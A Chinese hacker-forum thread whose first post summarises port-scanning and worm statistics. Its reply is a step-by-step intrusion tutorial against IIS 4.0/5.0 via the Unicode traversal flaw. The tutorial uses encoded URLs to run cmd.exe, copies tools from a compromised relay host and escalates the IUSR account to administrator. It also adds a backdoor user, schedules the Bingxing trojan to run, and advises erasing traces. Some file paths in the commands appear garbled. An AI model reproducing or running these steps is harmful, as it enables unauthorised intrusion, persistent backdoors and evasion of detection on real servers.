|
 | 作者: shengli [shengli]
 论坛用户 |
登录 |
| 黑客攻击前先扫描 如今,网络上的黑客攻击已经成了家常便饭,自动攻击和计算机蠕虫病毒正以闪电般的速度在网络上蔓延。今年7月10日到7月23日,Tel Aviv大学的开放端口就曾经被扫描达96000次,它抵挡了来自99个国家,82000名黑客枪林弹雨般的攻击。就此,ForeScout公司开发了一种叫做ActiveScout的防入侵技术,它有助于查明黑客的企图并防止网络攻击。据它观测,现在具有黑客行为的攻击与扫描具有以下特征: 约90%的攻击来自蠕虫 由于蠕虫病毒具有自动攻击和快速繁殖的特性,因此,它占网络攻击的大约90%,通常是系统扫描或同步攻击。其中,大部分网络攻击的来源地是美国。根据ActiveScout的数据,这些蠕虫病毒繁殖迅速,扫描和攻击相隔的时间很短,因此无法人为控制。蠕虫病毒也具有反复攻击的特性,它们会寻找同一端口并大规模入侵这些端口。如果人们不对蠕虫病毒采取防范措施,攻击/扫描的成功率将达到30%,即在10次扫描中,有3次能获得结果并可进行攻击。 96%的扫描集中在端口 端口扫描在网络扫描中大约占了96%,UDP(User Datagram Protocol)服务次之,占3.7%。除了这两种之外,剩余的0.3%是用户名和Frethem/index.htm" target="_blank" style='text-decoration: underline;color: #0000FF'>密码扫描、NetBIOS域登录信息和SNMP管理数据等。Tel Aviv大学已经开始努力防止蠕虫攻击和对NetBIOS弱点的网络攻击,因为这些攻击可能会感染所有的Windows系统。同时,在发送流量之前,要求ISP对所有的NetBIOS流量进行过滤。 有调查表明:在过去的半年中,存在危险性的Internet流量数量已经增加了2倍;暗噪声主要是由网络探测引起的,45%到55%的可疑行为都是黑客对计算机的扫描造成的;大多数攻击都是自动的,小型程序攻击通常来自以前中毒的计算机;黑客攻击这些网络的主要原因是寻找他们能用来传播垃圾邮件、为非法文件寻找特别存储空间的计算机,或者占用可用于下一次攻击的机器。 10种端口最易受攻击 某组织I-Trap曾经收集了来自24个防火墙12小时工作的数据,这些防火墙分别位于美国俄亥俄州24个企业内网和本地ISP所提供的Internet主干网之间。其间,黑客攻击端口的事件有12000次之多,下表是攻击的详细情况。 |
| 地主 发表时间: 04-07-14 22:37 |
 | 回复: mark951 [mark951] 论坛用户 |
登录 |
|
Unicode漏洞 IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在的安全漏洞已经成为了黑客们忠爱的漏洞之一,有希望成为2000年最大的漏洞之一。在此向发现此漏洞的中联绿盟成员袁哥及想出利用映射网络盘方法来解决文件上传问题的l uandao2000致敬。好了,开工吧! 首先是要找到一台带有共享盘的肉鸡,然后将其共享盘映射会本地。找带共享盘的主机不是很难,用国产的黑客软件网络刺客就可以了,在网络刺客中“主机资源”菜单里找“扫描共享主机”,然后填写启始i p和结束ip以后按扫描就,去看会儿电视,再回来看看扫描到没有。没扫描到再换个地址试试,扫描到了的话就可以把他用共享资源菜单中的“影射指定网络盘”把他影射为自己主机的任意一个盘上。 下面的工作就是把工具copy到肉鸡上,假设对方的共享盘为E,ip为127.1.1.2,我们把它影射到了F盘上。现在我们需要copy 自己C盘下的gasys.dll、cmd.exe和getadmin.exe到对方的E盘下,可以到DOS下输入: C:>copy c:.dll F: 1 file(s) copied. C:>copy c:.exe F: 1 file(s) copied. C:>copy c:.exe F: 1 file(s) copied. 至此为止,肉鸡已经搞定了。现在我们要象主目标进行攻击了。假设对方网站的ip是127.1.1.1,先要把cmd.exe复制到scripts的目录下面,并且要改名,假设对方的物理盘为E : http://127.1.1.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+e:.exe+e:.exe 这样我们就已经把cmd.exe复制到了scripts的目录下,并改名为hackercn.exe。现在我们要用它把我们肉鸡上的E盘影射为这个网站服务器上的Y 盘: http://127.1.1.1/scripts/hackercn.exe?/c+net+use+Y:+\127.1.1.2 然后把我们copy过去的那3个文件再copy到网站服务器上(cmd.exe虽然刚才已经copy过去了,但因为改了名,所以还要再copy一次): http://127.1.1.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+Y:.dll+d:.dll http://127.1.1.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+Y:.exe+d:.exe http://127.1.1.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+Y:.exe+d:.exe 好了,现在我们需要把“IUSR_计算机名”这个帐号升级为Administrator(并不是每个站点都有“IUSR_计算机名”这个帐号)。假设这台计算机名为“S ERVERS”,那么我们可以这样做: http://127.1.1.1/scripts/getadmin.exe?IUSR_SERVERS 这样所有的访问者都有了Administrator限权,然后我们再来新建一个用户名为hacker密码为password的用户: http://127.1.1.1/cgi-bin/cmd.exe?/c%20c:.exe%20user%20hacker%20password%20/add 然后再把它授予Administrator限权: http://127.1.1.1/scripts/getadmin.exe?hacker 下来就是进入该系统并制作后门了: 在nt的dos下输入 C:>net use \127.1.1.1$ "password" /user:"hacker" 现在你已经登陆到了他的主机上,然后上传木马冰河: C:>copy C:_Server.exe \127.1.1.1$ 然后用net time来获得对方的时间: C:>net time \127.1.1.1 假设对方的时间是5点40,那么我们将在5点43启动冰河程序: C:>at \127.1.1.1 05:43 G_Server.exe 这样我们就完整的实现了一次入侵,别忘了最后要打扫战场。用冰河删除我们上传过的东西。在“开始”菜单中的“程序”菜单里用“管理工具”中“域用户管理器”的“菜单用户”里选“选择域”,然后输入 127.1.1.1,然后还原我们做过手脚的用户。 剩下的事就可以用我们植入的冰河来干了。当然,不见得总会那么走运,在入侵中还会碰到最开始copy文件限权不够等等问题,这就需要大家开动脑筋来解决了。祝各位好运! |
| B1层 发表时间: 04-07-15 14:22 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 黑客攻击的十个漏洞